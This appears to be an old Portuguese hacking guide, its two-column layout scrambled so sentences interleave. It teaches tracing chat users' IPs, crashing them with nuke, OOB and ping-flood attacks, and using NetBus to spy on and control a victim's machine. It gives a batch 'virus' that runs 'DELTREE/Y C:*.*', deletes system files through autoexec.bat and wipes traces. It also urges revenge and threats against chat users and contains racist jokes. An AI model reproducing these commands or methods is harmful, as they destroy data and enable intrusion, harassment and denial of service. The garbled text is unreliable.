LOGAR EM MÁQUINAS REMOTAMENTE E COPIAR AQUELE INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMA
PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR NOO CITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO
SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA ESPAÇO ABAIXO VOCÊ VAI COLOCAR OPROBLEMA. DIGA
PARA ENTRAR NO SITEMA. QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS:
"EXCUSE ME FOR THE UP SET, BUT I DIDN’T RECEIVE MY
APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS SIGNAL".
DE REDES QUE EXISTEM. HOJE EM DIA, A MAIORIA DOS PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3
COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ OU 4 DIAS NO MÁXIMO QUE VOCÊ RECEBE SUA SENHA!
CONHECENDO A ARQUITETURA E PROTOCOLOS USADOS
FACILITA BASTANTE O ACESSO. ASTREANDO IP PELO MS-DOS
TODO MUNDO TEM O MS-DOS INSTALADO EM SEU
APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM COMPUTADOR, POR ISSO, QUASE NINGUÉM SABE QUE
DIA NA INTERNET. ISSO SE VOCÊ QUISER SER UM HACKER TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA.
DA NET.
MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP?
DIAL UP
DEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO
CAPACIDADE DE PROTEÇÃO QUE PERMITE QUE SE CONECTA A UM SERVIDOR. UM EXEMPLODE SERVIDOR
QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROS
REDE DIAL UP, COM UMA CONEXÃO PPP, O WINDOWS É REPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO
UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OS NÚMERO QUE VARIA. NO BRASIL, TODOS OS IP’S
PORTUGUESES, NEGROS E O RUBINHO BARRICHELO. COMEÇAM COM 200.
MESMO QUE VOCÊ NÃO ESTEJA UTILIZANDO O
COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA
PODE INVADIR SEU COMPUTADOR SE VOCÊ ESTIVER CHAMADO ARP, PRESENTE NO DOS. O COMANDO QUE
FAZENDO ESTE TIPO DE CONEXÃO. DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE
ENDEREÇOS DE IP. MAS COMO SABER QUAL É O DA
PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMA
QUE ESTAR USANDO A REDE DIAL UP E UMA CONEXÃO INFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA
PESSOA QUE VOCÊ QUER SABER O IP. E DAÍ ENTRAR COM GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ
O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O PREFERIR, OU ODIAR, PARA A COBAIA IR.
PRIMEIRO.
KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ
TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O PODE DESATIVAR TECLAS DO TECLADO DA PESSOA. É
NETSTAT. COM ELE VOCÊ PODE RASTREAR QUAL É O MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE
SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA AS VOGAIS.
É COMPLICADO E VOCÊ QUER SABER COMO USÁ-LO
DIGITE NETSTAT –H, E A TELA DE AJUDA APARECE. O QUE FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO
FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A AO HD DA PESSOA E SUAS PARTIÇÕES! TUDO, TUDO
PESSOA. O NUKE É IUM PROGRAMA QUE ENVIA UMA SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE
MENSAGEM DE ERRO PELA PORTA 139, FAZENDO A QUISER! MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS
CONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR JAMAIS APAGUE!
O COMPUTADOR DA VÍTIMA USANDO O BACK ORIFICE OU
OUTRO PROGRAMA. O NUKE
HÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE,
MANUAL DO NETBUS PRINCIPALMENTE DEPOIS DO SURGIMENTO DO WINNUKE.
HOST NAME/IP- COLOQUE O IP DA VÍTIMA. SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SE
PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA ESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM
SELECIONADA. ALGUNS CASOS E EM OUTROS NÃO. INFELIZMENTE, ESSA
IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO É
COMO ESTÁ. NUKE! VAMOS ANALIZAR CADA UMA DAS DUAS
ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA TECNOLOGIAS COM PROFUNDIDADE SUFICIENTE PARA
LISTA. DESFAZER ESTE EQUÍVOCO. INICIALMENTE,
DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE. APRESENTAREMOS UM TEXTO DE AUTORIA R.
CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP
DA COBAIA, SE CONECTE. O QUE É NUKE?
SCAN- SCANEIA IP COM O PATCHE.
SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM
DA COBAIA. POSSUI ATÉ A OPÇÃO REMOVE A SERVER, OU PREMATURAMENTE COM UMA CONEXÃO TCP ATRAVÉS DO
SEJA, REMOVE O PATCHE DO MICRO DELA. ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS
OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA PACOTES PODEM SER DIRECIONADAS PARA O SERVIDOR,
CONFORME VOCÊ CLIQUE. OU PARA O CLIENTE.
SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ
APARECER NO MICRO DA COBAIA. TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A
SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE CONEXÃO FAZENDO COM QUE O CLIENTE OU O SERVIDOR
TROQUEM. SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUE
START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA NORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO
COBAIA. ENTRE OS DOIS. O EFEITO DE TAL PROGRAMA PARA A
MSG MANAGER- POSSIBILITA A VOCÊ MANDAR VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE
MENSAGENS DE ERRO, EDITADAS POR VOCÊ. VOCÊ PODE SEM EFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA
DEIXAR QUE ELA RESPONDA, OU NÃO... COMO SE VOCÊ FOSSE DESCONECTADO DO SERVIDOR DE
SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA IRC.
COBAIA, SALVANDO A IMAGEM DA COBAIA NO SEU
NETBUS. HISTÓRICO
GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL ACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O
ARQUIVO ELA ESTÁ INFECTADA, ETC. NUKE.C, PARA UNIX. SEU AUTOR SE CHAMAVA SATANIC
PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP
UTILIZA PARA CONECTAR, MUITO COMPLEXO, POIS COM MENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR,
EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ. FINALIZANDO ASSIM COM CONEXÕES TELNET. COM A
PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO
MICRO DA COBAIA. COLOQUE A LINHA DE COMANDO. SERVIDOR PASSARAM A NÃO SER MAIS EFICIENTES.
EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO, PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO
VOCÊ ESCOLHE. ENTANTO, O FATO DO CLIENTE NÃO POSSUIR UMA PORTA
SEND TEXT- SERVE PARA FALAR COM OUTROS FIXA PARA FIXA PARA ESTABELECER CONEXÃO COM O
INVASORES, CASO HAJA ALGUM. SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA
ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO ISSO FOI O DEESENVOLOVIMENTO DE PROGRAMAS QUE
PC DA VÍTIMA. VOCÊ PODE ATIVAR, FECHAR OU ABRIR VARREM SEQUENCIALMENTE TODAS AS PORTAS DO
QUALQUER JANELA. CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A
APP REDIRECT- BESTEIRA 65535), BOMBARDEANDO ELAS COM MENSAGENS DE ERRO
MOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O ATÉ QUE SE ENCONTRE A PORTA ONDE SE DEU A
MOUSE DELA FICAR. A COBAIA VAI FICAR LOUCA... CONEXÃO COM O SERVIDOR.
LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O
QUE A PESSOA ESCREVE E ESCREVER PARA ELA (HE, O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA
HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM EM MUITO OS EQUIVALENTES PARA WINDOWS, ALÉM DE
CANAL ABERTO, PARA QUEIMAR O FILME DELA COM GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO AS
FRASES CABULOSAS. LIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE
SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE NUKING DESENVOLVIDOS PARA O WINSOCK 2.2 JÁ ESTÃO
SOM DA VÍTIMA. AUMENTE NO MÁXIMO E EXECUTE UMA SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS
FILE WAVE! DO QUE OS SEUS ANTECESSORES PARA A PLATAFORMA
MICROSOFT. ENTRE ESSES POSSO CITAR O CLICK4 QUE
SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS REALMENTE É MUITO MAIS PODEROSO.
DA PESSOA.
UM DOS PRIMEIROS PROGRAMAS NUKE PARA A
CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA. PLATAFORMAWINDOWS, FOI O WNUKE. É UM APLICATIVO
EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET
WINSOCK PARA ENVIAR OS PACOTES. FORAM LANÇADAS TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTE
DIVERSAS VERSÕES DESTE PROGRAMA, CADA UMA ENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A
IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO DETERMINADAS PORTAS DO SEU COMPUTADOR (SENDO
TIPO DE MENSAGEM ICMP ENVIADA E DELAY ENTRE O QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS
ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA DESABILTA TOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA
PODERIA SER UTILIZADO POR PESSOAS QUE NÃO DISPÕE MÁQUINA RETORNANDO AO NORMAL APENAS APÓS O
DE UMA CONEXÃO DE ALTA VELOCIDADE COM A REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES
INTERNET. DISPONÍVEIS QUE SIMPLESMENTE FECHAM A PORTA 139.
ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODE SER
COMO EU UTILIZO O NUKE? EXECUTADO EM OUTRAS PORTAS MENOS USUAIS
BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM TAMBÉM. DA MESMA FORMA, OS DETETORES DE QUE SE
O MESMO PRINCÍPIO: DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE
OOB TAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE
DEFINIR O ALVO DOS PACOTES; LIMITAM-SE A OUVIR A PORTA 139. ALÉM DISSO, ELES NÃO
DEFINIR O HOST DO CLIENTE; DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ
DEFINIR O HOST DO SERVIDOR; QUE O ATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM
DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE; NUKE CANÔNICO, MAS APENAS UM EXPLOIT DE UM BUG
DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR; DO MICROSOFT WINSOCK.
DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS;
UMA VEZ DETERMINADOS ESSES PARÂMETROS O PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHAT
PROGRAMA INICIA O ENVIO DE PACOTES DE ERRO.
QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A JÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM
INTERNET, MAIS RÁPIDO SERÁ O ENVIO DOS PACOTES, E CHAT DE WWW E ALGUÉM TE XINGAR. XINGAR NÃO
MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DA RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE
PORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A VINGAR COM UM POUCO MAIS DE CLASSE? SERIA UMA
VARREDURA A PARTIR DA PORTA 6667, QUE É A PORTA BOA HEIN? QUE TAL NUKAR O OTÁRIO OU ENTRAR EM NO
DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC. SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO?
ISSO SIM QUE É ESTILO! COM UM RASTREADOR DE IP E
O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODER LEGAL.
DETERMINADA PREFERENCIALMENTE PELO TIPO DE ALVO.
SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE
HOST UNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA. TAGS HTML É MAIS FÁCIL DO QUE PEGAR IP EM SALA QUE
NO CASO DE MÁQUINA WINDOWS, "PROTOCOL ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO
UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE. PROMPT DO MS DOS E DIGITE ARP –A. COM ISSO IRÁ
APARECER UM MONTE DE IP’S. O PRIMEIRO IP É O SEU EO
OOB: O BUG DA PORTA 139 ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA
MENSAGEM. VAMOS SUPOR QUE O RICK TE MANDOU UMA
DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI
TRAVAR SISTEMAS WINDOWS, GERANDO DoS ATRAVÉS AO E DIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK.
DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO PRONTO, AGORA VOCÊ JÁ TEM O IP PROMPT DO MSDOS
COMO URGENTE PARA AS PORTAS ESPECÍFICAS, COMO DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR
POR EXEMPLO A PORTA 139. SISTEMAS WINDOWS NT SEM O OTÁRIO.
O HOTFIX.
OS VÍRUS
OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS OS VÍRUS PODEM SER CCATALOGADOS EM TRÊS
OUTRAS PORTAS. APESAR DE SEREM CHAMADOS DE CATEGORIAS BÁSICAS:
NUKE, NA VERDADE ESSES PREGRAMAS TEM
FUNCIONAMENTO TOTALMENTE DIFERENTE, ELES APENAS VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS
SE APROVEITAM DE UMA FALHA DO SISTEMA. BASICAMENTE POR DISQUETES, COPIANDO-SE PARA O
SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O
CONFORME DESCRITO EM SEÇÕES ANTERIORES, O COMPUTADOR LÊ QUANDO É LIGADO). JÁ TIVERAM O SEU
FUNCIONAMENTO DE PROGRAMAS NULE É DIFERENTE. OS ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAIS RAROS.
EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTE
PERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS
ENTRA EM PÂNICO E GERALMENTE É NECESSÁRIA A DE ARQUIVOS ESTES PROGRAMAS SE ANEXAM AO
REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS,
SEJA NORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU
PATCHES DISPONÍVEIS PARA RESOLVER ESTE PROBLEMA. .COM. QUANDO UM PROGRAMA INFECTADO É
EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO
PINGA BOOM COMPUTADOR E LÁ INFECTA OUTROS PROGRAMAS,
EXECUTADOS POSTERIORMENTE.
INICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS
FALANDE DE CTCP PING, E SIM DO PROGRAMA PING QUE VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE
VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ GABARITOS (TEMPLATES) DO MICROSOFT OFFICE,
ACESSÍVEL. O MAU USO INTENCIONADO DESTE PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR
PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A DESTA CONTAMINAÇÃO. TODO O DOCUMENTO CRIADO
REDE FAZ COM QUE A VÍTIMA CAIA NUM LAG QUE POSSUIRÁ VÍRUS DENTRO DELE, E ESTE É UMA RAZÃO
PROVAVELMENTE O LEVARÁ A DESCONEXÃO POR PING PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS
TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES DIFUNDIDA ATUALMENTE. A OUTRA É A RAZÃO DE SER
RECEBIDOS SUPERAR EM MUITO A CAPACIDADE DE MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM
ESSES MESMOS SEREM DESENVOLVIDOS. COMO ASSEMBLER OU C++ UTILIZADA PELOS
PROGRAMADORES DE VÍRUS EXECUTÁVEIS.
WINNUKE
UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A
UM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT OPÇÃO DE PROTEÇÃO CONTRA VÍRUS HABILITADA NO
PERMITE QUE USUÁRIOS EXTERNOS POSSAM DESATIVAR WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENU
FERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A
CONRA VÍRUS DE MACRO. ASSIM, SEMPRE QUE ALGUM MANUTENÇÃO DE CASA MESMO, VIA TELNET.
ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA
OPÇÃO DE DESABILIITAR O SEU CARREGAMENTO. PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO
UM PROGRAMA ESPECÍFICO. O WINDOWS 95 JÁ VEM COM
FAZER VÍRUS UM.
AGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS
DE VÍRUS "SIMPLES". VÍRUS MAIS COMPLEXOS, EXIGEM CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA
CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO NA PASTA WINDOWS, CLIQUE EM CONECTA, SISTEMA
LUGAR VOCÊ DEVE LOCALIZAR O ARQUIVO EDIT.COM NA REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO
PASTA C:WINDOWSCOMMAND. COM O ARQUIVO AO QUAL DESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E
ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O. "TIPO DO TERMINAL" SELECIONE TELNET VT100. FEITO
IRÁ APARECER UMA TELA AZUL. É UM EDITOR COM ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A
POUCOS RECURSOS. ENTÃO DIGITE: CONEXÃO COM O COMPUTADOR REMOTO.
FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O
@ECHO OFF SISTEMA REMOTO PEDE UMA SENHA. DIGITE "GUEST" E
APERTE ENTER. ISTO ABRIRÁ AS PORTAS DO
BREAK OFF COMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA
SÉRIE DE OPÇÕES, PRECEDIDAS DE UM NÚMERO OU
DEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS,
QUER FAZER. DIGITE ALGUM DESSES NÚMEROS OU LETRAS E APERTE
ENTER. EXPLORE O SISTEMA AO QUAL VOÊ CONECTOU
VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS PARA EXERCITAR.
ARQUIVOS DO PC ALHEIO. VOCÊ DEVE USAR OS
SEGUINTES COMANDOS: COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS
SERVIDORES NÃO PERMITE ACESSO AO PÚBLICO VIA
DELTREE/Y C:*.* TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE
ENTRADA PARA HACKERS. NESTES SERVIDORES NÃO SE
CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA, ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELO
USE OS SEGUINTES COMANDOS: SITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A
NECESSIDADE DE CONHCER ALGUNS COMANDOS
DEL C:AUTOEXEC.BAT BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS
VEZES VAI TER ACESSSO A PROVEDORES DE PRESENÇA,
DEL C:COMMAND.COM DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUAR
ALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE
DEL C:CONFIG.SYS ABAIXO UMA LISTA QUE LHE SERÃO MUUITO ÚTEIS NESTE
CASO:
É UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR
OS SEUS VÍRUS E PARA QUE ELES FAÇAM O QUE VOCÊ LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIO
QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO
VÍRUS).BAT AUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA LS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO,
DE ESTAR EXECUTANDO O SEU VÍRUS AO INICIAR O INCLUSIVE OS HIDDEN
COMPUTADOR ALVO.
CP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O
DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO DIRETÓRIO Y
.BAT, DE FORMA QUE FIQUE: OQUEQUISER.BAT. AGORA O
SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O MV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O
VÍRUS IRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS. DIRETÓRIOY

IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA RM X: DELETA O ARQUIVO X


DISQUETE, VOCÊ NÃO DEVE ESQUECER DE FINALIZAR O
ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE CD XXX: MUDA O DIRETÓRIO ATIVO PARA XXX
PARA NÃO DEIXAR VESTÍGIO DO SEU ATO INSANO.
CD..: SAI DE UM DIRETÓRIO
TELNET
É O PROTOCOLO INTERNET PARA ESTABELECER MKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO
CONEXÃO ENTRE COMPUTADORES. ATRAVÉS DESSA ATUAL
CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E
COMANDOS EM OUTRA MÁQUINA, COMO SE O TECLADO RM XXX: REMOVE O DIREÓRIO XXX
DE SEU COMPUTADOR ESTIVESSE LIGADO DIRETAMENTE
A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É OS PROTOCOLOS TCP/IP
SEMELHANTE AO QUE SE TEM EM BBS’S DE INTERFACE PARA ENTENDER COMO ATAQUES FUNCIONAM, É
DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DA NECESSÁRIO TER UMA PEQUENA NOÇÃO DE COMO
MESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE TRABALHA A INTERNET, OU PELO MENOS COMO
COMANDOS UNIX OU A PARTIR DE UM MENU DE FUNCIONA A SUA BASE DE PROTOCOLOS DE
COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É
ALGUM LUGAR DA TELA (ESTA ÚLTIMA É A MAIS COMUM CHAMADA TCP/IP. COMO SABEMOS, CADA COMPUTADOR
ESTRE SERVIDORES QUE PERMITEM ACESSO AO LIGADO À INTERNET É IDENTIFICADO POR UM NÚMERO DE
PÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM
DE INFORMAÇÕES E TRANFERÊNCIA DE ARQUIVOS – NÚMERO DE IP FIXO, CADA VEZ QUE SE CONECTAM AO
TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁ PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR
CONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA
MUITO USADO POR OPERADORES DE SISTEMAS (SYSOPS) MÁQUINA DENTRE MILHÕES CONECTADAS A INTERNET,
A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA
PENSA QUE O SYSOP DE SEU PROVEDOR SAI DE CASA TROQUE INFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM
TODA VEZ QUE TEM ALGUM PROBLEMA NOS SERVIDORES, MESMO ENDEREÇO DE IP 200.230.137.4 PODE SER
UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP. PROGRAMA FTP.EXE
COMO UM CLIENTE DE WWW PEDE UM SERVIÇO PARA UM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O
ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUS PROGRAMA NÃO RODA DIREITO.
DIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE E UM PROVEDOR DE INTERNET PEQUENO A GOSTO.
SURGE UM IMPORTANTE CONCEITO, MUITAS VEZES MODO DE PREPARO:
NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARA
PREENCHER OS VÁRIOS TIPOS DE ATAQUES DE LIGUE O COMPUTADOR.
CRACKERS, QUE É O DA "PORTA". AGORA, ALÉM DE CONECTE-SE À INTERNET.
DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS CLIQUE EM INICIAR OU START, DEPENEENDO DO
IDENTIFICAR OS SERVIÇOS QUE ELAS PRESTAM, E CADA RUINDOWS.
UM DELES É IDENTIFICADO COM UM NÚMERO DIFERENTE. CLIQUE EM EXECUTAR.
ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS DIGITE FTP E CLIQUE EM OK.
CONFUSÃO. POR EXEMPLO, PARA UTILIZAR O SERVIÇO DE DEPOIS O PROGRAMA COMEÇARÁ.
WWW DA NOSSA MÁQUINA 200.230.137.4, BASTA AÍ VOCÊ VERÁ "FTP>"
ABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA DAÍ DIGITE OPEN www.provedor .COM.BR
A PORTA 21, O ICQ USA PORTAS NA FAIXA 1000-2000, E IRC NO LOGIN DIGITE: "ANONYMOUS"
PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535 NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O
NÚMEROS DISPONÍVEIS PARA SEREM UTILIZADOS EM UMA SEU E TEM QUE SER UM QUE NÃO CHAME MUITO A
ÚNICA MÁQUINA. QUANTO MAIS SERVIÇOS A MÁQUINA ATENÇÃO.
OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E
DISPONIBILIZADOS. ATÉ MESMO A SUA MÁQUINA AGORA? O QUE FAZER? EU IREI LEVÁ-LO AO ARQUIVO QUE
